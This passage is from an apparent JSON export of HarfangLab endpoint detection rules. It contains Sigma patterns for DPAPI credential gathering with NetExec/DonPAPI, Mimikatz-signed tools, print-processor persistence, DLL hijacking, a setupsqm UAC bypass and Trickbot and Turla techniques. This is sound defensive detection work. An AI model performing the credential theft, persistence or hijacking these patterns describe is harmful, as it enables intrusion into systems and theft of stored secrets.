*Windows\\Temp\\\\*'\n - 'cmd.exe /Q /c esentutl.exe *\\\\* *Windows\\Temp\\\\*'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5404c14d-2047-4c33-ac6d-2f18e200d173",
"rule_name": "DPAPI Sensitive Files Gathered via NetExec/DonPAPI",
"rule_description": "Detects sensitive file gathering via dploot.\ndploot is a Python module specialized in gathering DPAPI (Data Protection Application Programming Interface) protected credentials; it is used in tools such as DonPAPI and NetExec.\nDPAPI is a method to encrypt and decrypt sensitive data such as credentials using the CryptProtectData and CryptUnprotectData functions, which are used in particular by browsers.\nIt is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\n",
"rule_creation_date": "2024-10-15",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1047",
"attack.t1539",
"attack.t1555.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "541b8dbb-5c51-45c6-a1c0-c427bc3f566d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604492Z",
"creation_date": "2026-03-23T11:45:34.604496Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604503Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/gentilkiwi/mimikatz"
],
"name": "gentilkiwi_signed_tool.yml",
"content": "title: Gentilkiwi Signed Tool Executed\nid: 541b8dbb-5c51-45c6-a1c0-c427bc3f566d\ndescription: |\n Detects the execution of a binary signed by gentilkiwi.\n Gentilkiwi is a developer known for developing popular offensive security tooling, such as Mimikatz, which focuses on credential access and lateral movement.\n It is recommended to determine if this tooling is expected in your environment at this time, for instance, in the case of a security audit. If not, investigate activity around this action to determine maliciousness.\nreferences:\n - https://github.com/gentilkiwi/mimikatz\ndate: 2021/03/03\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Signature|contains: 'Open Source Developer, Benjamin Delpy'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "541b8dbb-5c51-45c6-a1c0-c427bc3f566d",
"rule_name": "Gentilkiwi Signed Tool Executed",
"rule_description": "Detects the execution of a binary signed by gentilkiwi.\nGentilkiwi is a developer known for developing popular offensive security tooling, such as Mimikatz, which focuses on credential access and lateral movement.\nIt is recommended to determine if this tooling is expected in your environment at this time, for instance, in the case of a security audit. If not, investigate activity around this action to determine maliciousness.\n",
"rule_creation_date": "2021-03-03",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "544c6c30-5199-4f81-849a-17bf35c61857",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075498Z",
"creation_date": "2026-03-23T11:45:34.075500Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075504Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1547/012/"
],
"name": "t1547_012_persistence_registry_print_processors.yml",
"content": "title: Print Processor Persistence Added\nid: 544c6c30-5199-4f81-849a-17bf35c61857\ndescription: |\n Detects the installation of a new Print Processor on the system.\n Print Processors are DLLs that are loaded by the print spooler service at startup, with local admin privileges.\n Adversaries can register a malicious Print Processor to establish persistence, as the registered DLL will be loaded in spoolsv.exe whenever the system starts.\n It is recommended to investigate the registered DLL located in the Processor Directory (usually \"C:\\Windows\\system32\\spool\\PRTPROCS\\x64\").\nreferences:\n - https://attack.mitre.org/techniques/T1547/012/\ndate: 2024/08/24\nmodified: 2025/02/20\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.012\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.PrintSpooler\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n TargetObject: 'HKLM\\SYSTEM\\\\*ControlSet*\\Control\\Print\\Environments\\Windows*\\Print Processors\\\\*'\n EventType: 'SetValue'\n\n filter_empty:\n Details:\n - ''\n - '(empty)'\n\n filter_spoolsv:\n ProcessImage: '?:\\Windows\\System32\\spoolsv.exe'\n\n exclusion_applidis:\n Details: 'AdisPrintProcessor64.dll'\n ProcessSigned: 'true'\n ProcessImage:\n - '?:\\Program Files (x86)\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\Printer\\AddClearUPrinter.exe'\n - '?:\\Program Files\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\Printer\\AddClearUPrinter.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "544c6c30-5199-4f81-849a-17bf35c61857",
"rule_name": "Print Processor Persistence Added",
"rule_description": "Detects the installation of a new Print Processor on the system.\nPrint Processors are DLLs that are loaded by the print spooler service at startup, with local admin privileges.\nAdversaries can register a malicious Print Processor to establish persistence, as the registered DLL will be loaded in spoolsv.exe whenever the system starts.\nIt is recommended to investigate the registered DLL located in the Processor Directory (usually \"C:\\Windows\\system32\\spool\\PRTPROCS\\x64\").\n",
"rule_creation_date": "2024-08-24",
"rule_modified_date": "2025-02-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5458adb2-cb54-4163-a842-5b08a8b9f5de",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078881Z",
"creation_date": "2026-03-23T11:45:34.078884Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078888Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_netstat.yml",
"content": "title: DLL Hijacking via netstat.exe\nid: 5458adb2-cb54-4163-a842-5b08a8b9f5de\ndescription: |\n Detects potential Windows DLL Hijacking via netstat.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'netstat.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\snmpapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5458adb2-cb54-4163-a842-5b08a8b9f5de",
"rule_name": "DLL Hijacking via netstat.exe",
"rule_description": "Detects potential Windows DLL Hijacking via netstat.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "545a880e-352c-4108-bf6a-4ac36129b177",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084551Z",
"creation_date": "2026-03-23T11:45:34.084553Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084557Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"http://www.labofapenetrationtester.com/2015/09/bypassing-uac-with-powershell.html"
],
"name": "t1548_002_uac_bypass_setupsqm.yml",
"content": "title: UAC Bypass Executed via setupsqm.exe\nid: 545a880e-352c-4108-bf6a-4ac36129b177\ndescription: |\n Detects the setupsqm.exe process loading an unsigned wdscore.dll, which may be indicative of a UAC bypass.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the loaded DLL and the responsible user session for malicious content or actions.\nreferences:\n - http://www.labofapenetrationtester.com/2015/09/bypassing-uac-with-powershell.html\ndate: 2020/09/18\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\Windows\\System32\\oobe\\setupsqm.exe'\n ImageLoaded: '*\\Windows\\System32\\oobe\\wdscore.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "545a880e-352c-4108-bf6a-4ac36129b177",
"rule_name": "UAC Bypass Executed via setupsqm.exe",
"rule_description": "Detects the setupsqm.exe process loading an unsigned wdscore.dll, which may be indicative of a UAC bypass.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the loaded DLL and the responsible user session for malicious content or actions.\n",
"rule_creation_date": "2020-09-18",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5467392a-8c65-4290-9a1d-1c185c05f1fb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608305Z",
"creation_date": "2026-03-23T11:45:34.608308Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608315Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://threatresearch.ext.hp.com/deobfuscating-ostap-trickbots-javascript-downloader/",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1059/"
],
"name": "t1204_002_suspicious_script_execution_officer_templates_folder.yml",
"content": "title: Suspicious Script Execution from Office Templates Folder\nid: 5467392a-8c65-4290-9a1d-1c185c05f1fb\ndescription: |\n Detects the execution of suspicious Windows scripts located in the Office templates folder.\n This technique was used by Trickbot to deploy the OSTAP backdoor by dropping the JScript downloader in \"%AppData%\\Microsoft\\Templates\".\n It is recommended to investigate the activity performed by the process and the content of the script.\nreferences:\n - https://threatresearch.ext.hp.com/deobfuscating-ostap-trickbots-javascript-downloader/\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1059/\ndate: 2023/12/14\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.t1059\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName:\n - 'wscript.exe'\n - 'cscript.exe'\n CommandLine|contains: '\\Microsoft\\Templates\\'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5467392a-8c65-4290-9a1d-1c185c05f1fb",
"rule_name": "Suspicious Script Execution from Office Templates Folder",
"rule_description": "Detects the execution of suspicious Windows scripts located in the Office templates folder.\nThis technique was used by Trickbot to deploy the OSTAP backdoor by dropping the JScript downloader in \"%AppData%\\Microsoft\\Templates\".\nIt is recommended to investigate the activity performed by the process and the content of the script.\n",
"rule_creation_date": "2023-12-14",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "548f2354-2b4d-4812-b5b4-b02aed0f2c12",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098508Z",
"creation_date": "2026-03-23T11:45:34.098510Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098514Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rasdial.yml",
"content": "title: DLL Hijacking via rasdial.exe\nid: 548f2354-2b4d-4812-b5b4-b02aed0f2c12\ndescription: |\n Detects potential Windows DLL Hijacking via rasdial.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rasdial.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\RASAPI32.dll'\n - '\\rasman.dll'\n - '\\rtutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "548f2354-2b4d-4812-b5b4-b02aed0f2c12",
"rule_name": "DLL Hijacking via rasdial.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rasdial.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "54a59f85-d6f9-44be-80d9-753a6566f57d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079100Z",
"creation_date": "2026-03-23T11:45:34.079102Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079107Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_chrome.yml",
"content": "title: DLL Hijacking via chrome.exe\nid: 54a59f85-d6f9-44be-80d9-753a6566f57d\ndescription: |\n Detects potential Windows DLL Hijacking via chrome.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/10/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'chrome.exe'\n ProcessSignature: 'Google LLC'\n ImageLoaded|endswith:\n - '\\dataexchange.dll'\n - '\\explorerframe.dll'\n - '\\mswsock.dll'\n - '\\ntmarta.dll'\n - '\\propsys.dll'\n - '\\windows.storage.dll'\n - '\\dwmapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program 
Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "54a59f85-d6f9-44be-80d9-753a6566f57d",
"rule_name": "DLL Hijacking via chrome.exe",
"rule_description": "Detects potential Windows DLL Hijacking via chrome.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-10-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "54a90583-1d04-484b-a12c-b7e9d9a557ed",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627810Z",
"creation_date": "2026-03-23T11:45:34.627812Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627817Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_suspicious_pdb_rundll.yml",
"content": "title: Suspicious DLL with a Program Database Extension Loaded via RunDLL32\nid: 54a90583-1d04-484b-a12c-b7e9d9a557ed\ndescription: |\n Detects a suspicious DLL load with a .pdb extension.\n This command is seen in Turla's Mosquito malware, which is commonly delivered through spearphishing attachments.\n The malware will place a DLL file with a \".pdb\" extension at a random or deep path in %APPDATA% and use RunDLL32.exe to load it.\n It is recommended to investigate the loaded pdb file, as well as other actions taken by the parent process.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/12/06\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - attack.initial_access\n - attack.t1566.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Rundll32\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n\n selection_cmd:\n CommandLine|contains: '.pdb'\n\n # This filter prevents false positives such as:\n # rundll32 toto.dll,function file.pdb\n filter_later_pdb:\n CommandLine|contains: '.dll* *.pdb'\n\n condition: all of selection_* and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "54a90583-1d04-484b-a12c-b7e9d9a557ed",
"rule_name": "Suspicious DLL with a Program Database Extension Loaded via RunDLL32",
